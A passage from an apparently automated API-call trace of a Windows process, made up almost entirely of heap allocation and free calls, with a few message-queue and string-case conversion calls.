hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.119] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0168.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0168.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 